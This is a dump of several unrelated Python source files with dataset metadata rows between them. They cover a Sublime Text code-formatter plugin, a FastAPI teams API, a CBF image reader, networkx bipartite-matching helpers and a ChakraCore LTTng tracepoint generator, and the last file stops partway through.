from .htmlformatter import HtmlFormatter
from .cssformatter import CssFormatter
from .scssformatter import ScssFormatter
from .pyformatter import PyFormatter
from .vbscriptformatter import VbscriptFormatter
from .coldfusionformatter import ColdfusionFormatter
from .goformatter import GoFormatter
except (ValueError):
# Python 2
from phpformatter import PhpFormatter
from jsformatter import JsFormatter
from htmlformatter import HtmlFormatter
from cssformatter import CssFormatter
from scssformatter import ScssFormatter
from pyformatter import PyFormatter
from vbscriptformatter import VbscriptFormatter
from coldfusionformatter import ColdfusionFormatter
from goformatter import GoFormatter
class Formatter:
def __init__(self, view, syntax=None):
self.platform = sublime.platform()
self.classmap = {}
self.st_version = 2
if sublime.version() == '' or int(sublime.version()) > 3000:
self.st_version = 3
self.file_name = view.file_name()
self.settings = sublime.load_settings('CodeFormatter.sublime-settings')
self.packages_path = sublime.packages_path()
self.syntax_file = view.settings().get('syntax')
self.syntax = syntax or self.get_syntax()
# map of settings names with related class
map_settings_formatter = [
('codeformatter_php_options', PhpFormatter),
('codeformatter_js_options', JsFormatter),
('codeformatter_css_options', CssFormatter),
('codeformatter_html_options', HtmlFormatter),
('codeformatter_python_options', PyFormatter),
('codeformatter_vbscript_options', VbscriptFormatter),
('codeformatter_scss_options', ScssFormatter),
('codeformatter_coldfusion_options', ColdfusionFormatter),
('codeformatter_go_options', GoFormatter),
]
for name, _class in map_settings_formatter:
syntaxes = self.settings.get(name, {}).get('syntaxes')
if not syntaxes or not isinstance(syntaxes, str):
continue
for _formatter in syntaxes.split(','):
self.classmap[_formatter.strip()] = _class
def format(self, text):
formatter = self.classmap[self.syntax](self)
try:
stdout, stderr = formatter.format(text)
except Exception as e:
stdout = ''
stderr = str(e)
return self.clean(stdout), self.clean(stderr)
def exists(self):
return self.syntax in self.classmap
def get_syntax(self):
pattern = re.compile(
r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')
m = pattern.search(self.syntax_file)
found = ''
if m and len(m.groups()) > 0:
found = m.groups()[0]
return found.lower()
def format_on_save_enabled(self):
if not self.exists():
return False
formatter = self.classmap[self.syntax](self)
return formatter.format_on_save_enabled(self.file_name)
def clean(self, string):
if hasattr(string, 'decode'):
string = string.decode('UTF-8', 'ignore')
return re.sub(r'\r\n|\r', '\n', string)
| 34.071429 | 99 | 0.653826 | 2,517 | 0.659591 | 0 | 0 | 0 | 0 | 0 | 0 | 687 | 0.180031 |
17d69728ccc0d7694c2df558651b0fdf5636b10f | 2,048 | py | Python | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | from typing import List, Optional
from attr import dataclass
from fastapi import APIRouter, Security
from fastapi.exceptions import HTTPException
from fastapi import Header
from pydantic import BaseModel
from pydantic.tools import parse_obj_as
from splash.api.auth import get_current_user
from splash.service import SplashMetadata
from splash.service.base import ObjectNotFoundError
from ..users import User
from . import NewTeam, Team
from .teams_service import TeamsService
teams_router = APIRouter()
@dataclass
class Services():
teams: TeamsService
services = Services(None)
def set_teams_service(svc: TeamsService):
services.teams = svc
class CreateTeamResponse(BaseModel):
uid: str
splash_md: SplashMetadata
@teams_router.get("", tags=["teams"], response_model=List[Team])
def read_teams(
page: int = 1,
page_size: int = 100,
current_user: User = Security(get_current_user)):
results = services.teams.retrieve_multiple(current_user, page=page, page_size=page_size)
return parse_obj_as(List[Team], list(results))
@teams_router.get("/{uid}", tags=['teams'], response_model=Team)
def read_team(
uid: str,
current_user: User = Security(get_current_user)):
team = services.teams.retrieve_one(current_user, uid)
return team
@teams_router.post("", tags=['teams'], response_model=CreateTeamResponse)
def create_team(
team: NewTeam,
current_user: User = Security(get_current_user)):
response = services.teams.create(current_user, team)
return response
@teams_router.put("/{uid}", tags=['teams'])
def update_team(uid: str,
team: NewTeam,
current_user: User = Security(get_current_user),
response_model=CreateTeamResponse,
if_match: Optional[str] = Header(None)):
try:
response = services.teams.update(current_user, team, uid, etag=if_match)
except ObjectNotFoundError:
raise HTTPException(404)
return response
| 28.054795 | 92 | 0.70752 | 120 | 0.058594 | 0 | 0 | 1,348 | 0.658203 | 0 | 0 | 48 | 0.023438 |
17d6d2baf1ae470f49b44765fcb69dbd6a4f9357 | 1,635 | py | Python | iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | #!/usr/bin/env libtbx.python
#
# iotbx.xds.xds_cbf.py
#
# James Parkhurst, Diamond Light Source, 2012/OCT/16
#
# Class to read the CBF files used in XDS
#
from __future__ import absolute_import, division, print_function
class reader:
"""A class to read the CBF files used in XDS"""
def __init__(self):
pass
def read_file(self, filename):
"""Read the CBF file"""
import pycbf
self.cbf_handle = pycbf.cbf_handle_struct()
self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST)
self.cbf_handle.rewind_datablock()
def get_data(self):
"""Get the gain array from the file"""
import numpy
# Select the first datablock and rewind all the categories
self.cbf_handle.select_datablock(0)
self.cbf_handle.select_category(0)
self.cbf_handle.select_column(2)
self.cbf_handle.select_row(0)
# Check the type of the element to ensure it's a binary
# otherwise raise an exception
type = self.cbf_handle.get_typeofvalue()
if type.find('bnry') > -1:
# Read the image data into an array
image_string = self.cbf_handle.get_integerarray_as_string()
image = numpy.fromstring(image_string, numpy.int32)
# Get the array parameters
parameters = self.cbf_handle.get_integerarrayparameters_wdims()
image_size = (parameters[10], parameters[9])
# Resize the image
image.shape = (image_size)
else:
raise TypeError('Can\'t find image')
# Return the image
return image
if __name__ == '__main__':
import sys
import numpy
handle = reader()
handle.read_file(sys.argv[1])
image = handle.get_data()
| 26.803279 | 69 | 0.692355 | 1,263 | 0.772477 | 0 | 0 | 0 | 0 | 0 | 0 | 534 | 0.326606 |
17d6e153039df485af98e9c048abf9aa413e954d | 6,267 | py | Python | py_bipartite_matching/graphs_utils.py | FranciscoMoretti/PyBipartiteMatching | 1edc1b2867c0c2d221fb1deedd1a28ad905b674e | [
"MIT"
] | 1 | 2022-02-24T18:30:48.000Z | 2022-02-24T18:30:48.000Z | py_bipartite_matching/graphs_utils.py | FranciscoMoretti/PyBipartiteMatching | 1edc1b2867c0c2d221fb1deedd1a28ad905b674e | [
"MIT"
] | 1 | 2021-02-14T15:16:17.000Z | 2021-02-14T15:23:49.000Z | py_bipartite_matching/graphs_utils.py | FranciscoMoretti/py_bipartite_matching | 1edc1b2867c0c2d221fb1deedd1a28ad905b674e | [
"MIT"
] | null | null | null | # utils for graphs of the networkx library
import copy
import networkx as nx
from networkx.algorithms.shortest_paths import shortest_path
from typing import Any, Union, Optional, Iterator, Iterable, Tuple, Dict, List, cast
LEFT = 0
RIGHT = 1
def top_nodes(graph: nx.Graph,
data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
for node_id, node_data in graph.nodes(data=True).__iter__():
if node_data['bipartite'] == 0:
if data:
yield node_id, node_data
else:
yield node_id
def bottom_nodes(graph: nx.Graph,
data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
for node_id, node_data in graph.nodes(data=True).__iter__():
if node_data['bipartite'] == 1:
if data:
yield node_id, node_data
else:
yield node_id
def bipartite_node_positions(graph: nx.Graph) -> Dict[int, Tuple[int, int]]:
pos: Dict[int, Tuple[int, int]] = dict()
pos.update((n, (1, i)) for i, n in enumerate(top_nodes(graph))) # put nodes from X at x=1
pos.update((n, (2, i)) for i, n in enumerate(bottom_nodes(graph))) # put nodes from Y at x=2
return pos
def draw_bipartite(graph: nx.Graph) -> None:
pos = bipartite_node_positions(graph)
nx.draw(graph, pos=pos, with_labels=True, font_weight='bold')
def draw_nodes(graph: nx.Graph, labels: bool = False) -> None:
pos = bipartite_node_positions(graph)
nx.draw_networkx_nodes(graph, pos=pos, node_size=300)
if labels:
top_node_labels = {k: str(v['label']) for k, v in tuple(top_nodes(graph, data=True))}
nx.draw_networkx_labels(graph, pos=pos, labels=top_node_labels, horizontalalignment='left')
bottom_node_labels = {k: str(v['label']) for k, v in tuple(bottom_nodes(graph, data=True))}
nx.draw_networkx_labels(graph,
pos=pos,
labels=bottom_node_labels,
horizontalalignment='right')
else:
nx.draw_networkx_labels(graph, pos=pos)
def draw_edges(graph: nx.Graph, edge_list: Optional[Iterable[Tuple[Any, Any]]] = None) -> None:
pos = bipartite_node_positions(graph)
nx.draw_networkx_edges(graph, pos=pos, edgelist=edge_list)
def draw_matching(graph: nx.Graph, matching: Dict[Any, Any], labels: bool = False) -> None:
draw_nodes(graph, labels=labels)
draw_edges(graph, matching.items())
def find_cycle_with_edge_of_matching(graph: nx.Graph, matching: Dict[Any, Any]) -> List[Any]:
tmp_graph = copy.deepcopy(graph)
# Remove the edge so and find a path from a node of the edge to the other one.
# If a path is found, the circle is completed with the removed edge
for k, v in matching.items():
if not tmp_graph.has_edge(k, v):
# The graph could have been reduced
continue
tmp_graph.remove_edge(k, v)
try:
path = shortest_path(G=tmp_graph, source=v, target=k)
except nx.NetworkXNoPath:
tmp_graph.add_edge(k, v)
continue
else:
tmp_graph.add_edge(k, v)
return cast(List[Any], path)
# No cycle was found
raise nx.NetworkXNoCycle
def find_feasible_two_edge_path(graph: nx.Graph,
matching: Dict[Any, Any]) -> Optional[Tuple[Any, Any, Any]]:
# This path has the form top1 -> bottom -> top2 or bottom1 -> top -> bottom2
# first: must be in the left part of the graph and in matching
# second: must be in the right part of the graph and in matching
# third: is also in the left part of the graph and but must not be in matching
for top, bottom in matching.items():
if top in top_nodes(graph) and bottom in bottom_nodes(graph):
for new_bottom in graph.neighbors(top):
if new_bottom not in matching.values():
return (bottom, top, new_bottom)
for new_top in graph.neighbors(bottom):
if new_top not in matching:
return (top, bottom, new_top)
return None
def strongly_connected_components_decomposition(graph: nx.DiGraph) -> nx.DiGraph:
scc = nx.strongly_connected_components(graph)
for cc in scc:
for node in cc:
to_remove = set()
for neighbor in graph.adj[node]:
if neighbor not in cc:
to_remove.add(neighbor)
for neighbor in to_remove:
graph.remove_edge(node, neighbor)
return graph
def create_directed_matching_graph(graph: nx.Graph, top_nodes: Iterable[Any],
matching: Dict[Any, Any]) -> nx.DiGraph:
# creates a directed copy of the graph with all edges on both directions
directed_graph = graph.to_directed()
for top_node in top_nodes:
for bottom_node in graph.adj[top_node]:
if top_node in matching.keys() and bottom_node == matching[top_node]:
directed_graph.remove_edge(bottom_node, top_node)
else:
directed_graph.remove_edge(top_node, bottom_node)
# check for duplicated (should not exist any)
ordered_edges = [tuple(sorted(e)) for e in directed_graph.edges]
assert len(ordered_edges) == len(set(ordered_edges))
assert len(graph.edges) == len(directed_graph.edges)
assert len(graph.nodes) == len(directed_graph.nodes)
return directed_graph
def graph_without_nodes_of_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
"""Returns a copy of this bipartite graph with the given edge and its adjacent nodes removed."""
new_graph = nx.Graph(graph)
new_graph.remove_node(edge[0])
new_graph.remove_node(edge[1])
assert new_graph != graph
assert len(new_graph.nodes) == len(graph.nodes) - 2
return new_graph
def graph_without_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
"""Returns a copy of this bipartite graph with the given edge removed."""
new_graph = nx.Graph(graph)
new_graph.remove_edge(*edge)
assert len(new_graph.edges) == len(graph.edges) - 1
assert len(new_graph.nodes) == len(graph.nodes)
return new_graph | 39.415094 | 100 | 0.641615 | 0 | 0 | 668 | 0.10659 | 0 | 0 | 0 | 0 | 913 | 0.145684 |
17d70d0f739b0dba8004b1173a78f20e8da6da67 | 29,476 | py | Python | tools/lttng.py | Taritsyn/ChakraCore | b6042191545a823fcf9d53df2b09d160d5808f51 | [
"MIT"
] | 8,664 | 2016-01-13T17:33:19.000Z | 2019-05-06T19:55:36.000Z | tools/lttng.py | Taritsyn/ChakraCore | b6042191545a823fcf9d53df2b09d160d5808f51 | [
"MIT"
] | 5,058 | 2016-01-13T17:57:02.000Z | 2019-05-04T15:41:54.000Z | tools/lttng.py | Taritsyn/ChakraCore | b6042191545a823fcf9d53df2b09d160d5808f51 | [
"MIT"
] | 1,367 | 2016-01-13T17:54:57.000Z | 2019-04-29T18:16:27.000Z | #-------------------------------------------------------------------------------------------------------
# Copyright (C) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
#-------------------------------------------------------------------------------------------------------
import xml.dom.minidom as DOM
lttngDataTypeMapping = {
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const char *",
"win:GUID" :"const int",
"win:AnsiString" :"const char*",
"win:UnicodeString" :"const char*",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const uintptr_t",
"win:Binary" :"const char"
}
ctfDataTypeMapping = {
"win:Int64" :"ctf_integer",
"win:HexInt64" :"ctf_integer_hex",
"win:ULong" :"ctf_integer",
"win:count" :"ctf_sequence",
"win:Struct" :"ctf_sequence",
"win:GUID" :"ctf_sequence",
"win:AnsiString" :"ctf_string",
"win:UnicodeString" :"ctf_string",
"win:Double" :"ctf_float",
"win:Int32" :"ctf_integer",
"win:HexInt32" :"ctf_integer_hex",
"win:Boolean" :"ctf_integer",
"win:UInt64" :"ctf_integer",
"win:UInt32" :"ctf_integer",
"win:UInt16" :"ctf_integer",
"win:HexInt16" :"ctf_integer_hex",
"win:UInt8" :"ctf_integer", #actually a character
"win:Int8" :"ctf_integer", #actually a character
"win:Pointer" :"ctf_integer",
"win:Binary" :"ctf_sequence",
"xs:string" :"ctf_string",
"xs:unsignedLong" :"ctf_integer",
"xs:unsignedInt" :"ctf_integer"
}
palDataTypeMapping ={
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const void",
"win:GUID" :"const GUID",
"win:AnsiString" :"LPCSTR",
"win:UnicodeString" :"PCWSTR",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const void*",
"win:Binary" :"const char"
}
MAX_LTTNG_ARGS = 10
def getParamSequenceSize(paramSequence, estimate):
total = 0
pointers =0
for param in paramSequence:
if param in ["win:Int64", "win:UInt64", "win:Double"]:
total += 8
elif param in ["win:ULong", "win:Int32", "win:Boolean",]:
total += 4
elif param == "GUID":
total += 16
elif param in ["win:UInt16"]:
total += 2
elif param in ["win:Uint8", "win:Binary"]:
total += 1
elif param == "win:Pointer":
if estimate:
total += 8
else:
pointers += 1
elif estimate:
if param in ["win:AnsiString", "win:Struct"]:
total += 32
elif param in ["win:UnicodeString"]:
total += 64
else:
raise Exception ("Don't know size of " + param)
if estimate:
return total
return total, pointers
class Template:
def __repr__(self):
return "<Template " + self.name + " />"
def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts):
self.name = name
self.signature = FunctionSignature()
self.structCounts = structCounts
self.arrayCounts = arrayCounts
for variable in prototypes.paramList:
for dependency in dependencies[variable]:
if not self.signature.getParam(dependency):
self.signature.append(dependency, prototypes.getParam(dependency))
@property
def num_params(self):
return len(self.signature.paramList)
def getParam(self, name):
return self.signature.getParam(name)
@property
def estimatedSize(self):
total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True)
if total < 32:
return 32
elif total > 1024:
return 1024
return total
class FunctionSignature:
def __repr__(self):
return ', '.join(self.paramList)
def __init__(self):
self.LUT = {}
self.paramList = []
def append(self, variable, param):
self.LUT[variable] = param
self.paramList.append(variable)
def getParam(self, variable):
return self.LUT.get(variable)
def getLength(self):
return len(self.paramList)
class FunctionParameter:
def __repr__(self):
return self.name
def __init__(self, winType, name, count, outType, length):
self.winType = winType
self.outType = outType
self.name = name
self.length = length
self.count = "win:null"
if winType == "win:GUID" or count == "win:count":
self.count = "win:count"
ignoredXmlAttributes = frozenset(["map"])
usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"])
knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes
def checkKnownAttributes(nodes, templateName):
for node in nodes:
nodeMap = node.attributes
for attribute in nodeMap.values():
if attribute.name not in knownXmlAttributes:
raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName)
def getTopLevelElementsByTagName(node, tag):
return [e for e in node.getElementsByTagName(tag) if e.parentNode == node]
def parseTemplateNodes(templateNodes):
templates = {}
for templateNode in templateNodes:
templateName = templateNode.getAttribute('tid')
dataNodes = getTopLevelElementsByTagName(templateNode, 'data')
checkKnownAttributes(dataNodes, templateName)
functionPrototypes = FunctionSignature()
arrayCounts = {}
structCounts = {}
var_Dependencies = {}
for dataNode in dataNodes:
variable = dataNode.getAttribute('name')
wintype = dataNode.getAttribute('inType')
outType = dataNode.getAttribute('outType')
wincount = dataNode.getAttribute('count')
winLength = dataNode.getAttribute('length')
var_dependency = [variable]
if winLength:
if wincount:
raise Exception("Both count and length properties found on " + variable + " in template " + templateName)
if wincount.isdigit() and int(wincount) == 1:
wincount = ''
if wincount:
if wincount.isdigit():
raise Exception("Expect constant count to be length")
elif functionPrototypes.getParam(wincount):
var_dependency.insert(0, wincount)
arrayCounts[variable] = wincount
var_Dependencies[variable] = var_dependency
functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength)
functionPrototypes.append(variable, functionParameter)
structNodes = getTopLevelElementsByTagName(templateNode, 'struct')
for structNode in structNodes:
structName = structNode.getAttribute('name')
countName = structNode.getAttribute('count')
assert(countName in functionPrototypes.paramList)
#childData = structNode.getElementsByTagName("data")
#names = [x.attributes['name'].value for x in childData]
#types = [x.attributes['inType'].value for x in childData]
structCounts[structName] = countName
var_Dependencies[structName] = [countName, structName]
functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None)
functionPrototypes.append(structName, functionParameterPointer)
templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts)
return templates
def shouldPackTemplate(template):
return template.num_params > MAX_LTTNG_ARGS or len(template.structCounts) > 0 or len(template.arrayCounts) > 0
def generateArgList(template):
# Construct a TP_ARGS macro call, as defined in another macro, e.g.
#
# TP_ARGS( \
# int, my_integer_arg, \
# char*, my_string_arg \
# )
header = "TP_ARGS( \\\n"
footer = "\\\n)"
args = []
if shouldPackTemplate(template):
args.append(" const unsigned int, length")
args.append(" const char *, __data__")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
mappedType = lttngDataTypeMapping[wintypeName]
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
arg = " " + mappedType
if mappedCount != " ":
arg += mappedCount
elif functionParam.length:
arg += "*"
arg += ", " + functionParam.name
args.append(arg)
return header + ", \\\n".join(args) + footer
def generateFieldList(template):
# Construct a TP_FIELDS macro call, e.g.
# TP_FIELDS(
# ctf_string(my_string_field, my_string_arg)
# ctf_integer(int, my_integer_field, my_integer_arg)
# )
header = " " + " TP_FIELDS(\n"
footer = "\n )"
fieldList = []
if shouldPackTemplate(template):
fieldList.append(" ctf_integer(unsigned long, length, length)")
fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "")
if functionParam.outType:
wintypeName = functionParam.outType
ctf_type = None
field_body = None
varname = functionParam.name
if param in template.structCounts or param in template.arrayCounts:
# This is a struct, treat as a sequence
countVar = template.structCounts.get(param, template.arrayCounts.get(param))
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.prop))
elif functionParam.length:
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length))
else:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string":
field_body = ", ".join((varname, varname))
elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float":
field_body = ", ".join((mappedType, varname, varname))
elif ctf_type == "ctf_sequence":
raise Exception("ctf_sequence needs special handling: " + template.name + " " + param)
else:
raise Exception("Unhandled ctf intrinsic: " + ctf_type)
# fieldList.append("// " + wintypeName)
fieldList.append(" %s(%s)" % (ctf_type, field_body))
return header + "\n".join(fieldList) + footer
def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events):
headerLines = []
headerLines.append("")
headerLines.append("#ifdef __int64")
headerLines.append("#if TARGET_64")
headerLines.append("#undef __int64")
headerLines.append("#else")
headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")
headerLines.append("#endif // TARGET_64")
headerLines.append("#endif // __int64")
headerLines.append("#undef TRACEPOINT_PROVIDER")
headerLines.append("#undef TRACEPOINT_INCLUDE")
headerLines.append("")
headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n")
headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n")
headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")
headerLines.append("#define LTTNG_CHAKRA_H" + providerName +"\n")
headerLines.append("\n#include <lttng/tracepoint.h>\n\n")
for templateName in templates:
template = templates[templateName]
functionSignature = template.signature
headerLines.append("")
headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\")
tracepointArgs = generateArgList(template)
headerLines.append(tracepointArgs)
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" " + templateName + ",")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS,")
tracepointFields = generateFieldList(template)
headerLines.append(tracepointFields)
headerLines.append(")")
headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" " + templateName + ",\\")
headerLines.append(" name,\\")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS \\")
headerLines.append(")")
headerLines.append("")
headerLines.append("")
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" emptyTemplate,")
headerLines.append(" TP_ARGS(),")
headerLines.append(" TP_FIELDS()")
headerLines.append(")")
headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" emptyTemplate,\\")
headerLines.append(" name,\\")
headerLines.append(" TP_ARGS()\\")
headerLines.append(")")
headerLines.append("")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
if not eventName:
raise Exception(eventNode + " event does not have a symbol")
if not templateName:
headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")")
continue
headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")")
headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */")
headerLines.append("#include <lttng/tracepoint-event.h>")
return "\n".join(headerLines)
def generateMethodBody(template, providerName, eventName):
# Convert from ETW's windows types to LTTng compatiable types
methodBody = [""]
functionSignature = template.signature
if not shouldPackTemplate(template):
invocation = ["do_tracepoint(" + providerName, eventName]
for paramName in functionSignature.paramList:
functionParam = functionSignature.getParam(paramName)
wintypeName = functionParam.winType
winCount = functionParam.count
ctf_type = None
if functionParam.outType:
ctf_type = ctfDataTypeMapping.get(functionParam.outType)
else:
ctf_Type = ctfDataTypeMapping.get(winCount)
if not ctf_type:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString":
# Convert wchar unicode string to utf8
if functionParam.length:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");")
else:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");")
invocation.append(paramName + "_converter")
# elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer":
elif wintypeName == "win:Pointer":
invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName)
else:
invocation.append(paramName)
methodBody.append(",\n ".join(invocation) + ");")
else:
# Packing results into buffer
methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];")
methodBody.append("char *buffer = stackBuffer;")
methodBody.append("int offset = 0;")
methodBody.append("int size = " + str(template.estimatedSize) + ";")
methodBody.append("bool fixedBuffer = true;")
methodBody.append("bool success = true;")
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
if paramName in template.structCounts:
size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif paramName in template.arrayCounts:
size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif functionParameter.winType == "win:GUID":
methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);")
else:
methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);")
methodBody.append("if (!success)")
methodBody.append("{")
methodBody.append(" if (!fixedBuffer) delete[] buffer;")
methodBody.append(" return ERROR_WRITE_FAULT;")
methodBody.append("}")
methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);")
methodBody.append("if (!fixedBuffer) delete[] buffer;")
return "\n ".join(methodBody) + "\n"
def generateMethodSignature(template):
if not template:
return ""
functionSignature = template.signature
lineFunctionPrototype = []
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
wintypeName = functionParameter.winType
mappedType = palDataTypeMapping[wintypeName]
winCount = functionParameter.count
mappedCount = palDataTypeMapping[winCount]
if paramName in template.structCounts:
lineFunctionPrototype.append(" int " + paramName + "_ElementSize")
# lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length))
lineFunctionPrototype.append(
" " + mappedType
+ (mappedCount if mappedCount != " " else "*" if functionParameter.length and not wintypeName in ["win:UnicodeString", "win:AnsiString"] else "")
+ " "
+ functionParameter.name)
return ",\n".join(lineFunctionPrototype)
def generateLttngTracepointProvider(providerName, lttngHeader, templates, events):
providerLines = [];
providerLines.append("#define TRACEPOINT_DEFINE")
providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")
providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")
providerLines.append("#endif")
providerLines.append("#include \"stdlib.h\"")
providerLines.append("#include \"Common.h\"")
providerLines.append("#include \"Codex/Utf8Helper.h\"")
providerLines.append("#include \"" + lttngHeader + "\"\n\n")
providerLines.append("#ifndef tracepoint_enabled")
providerLines.append("#define tracepoint_enabled(provider, name) 1")
providerLines.append("#define do_tracepoint tracepoint")
providerLines.append("#endif")
providerLines.append("""
bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer)
{
newSize *= 1.5;
_ASSERTE(newSize > size); // Check for overflow
if (newSize < 32)
{
newSize = 32;
}
char *newBuffer = new char[newSize];
memcpy(newBuffer, buffer, currentLength);
if (!fixedBuffer)
{
delete[] buffer;
}
buffer = newBuffer;
size = newSize;
fixedBuffer = false;
return true;
}
bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer)
{
if (!src)
{
return true;
}
if (offset + len > size)
{
if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer))
{
return false;
}
}
memcpy(buffer + offset, src, len);
offset += len;
return true;
}
template <typename T>
bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer)
{
if (sizeof(T) + offset > size)
{
if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer))
{
return false;
}
}
*(T *)(buffer + offset) = value;
offset += sizeof(T);
return true;
}
""")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"
% (eventName, providerName, eventName))
providerLines.append("")
template = None
if templateName:
template = templates[templateName]
providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(")
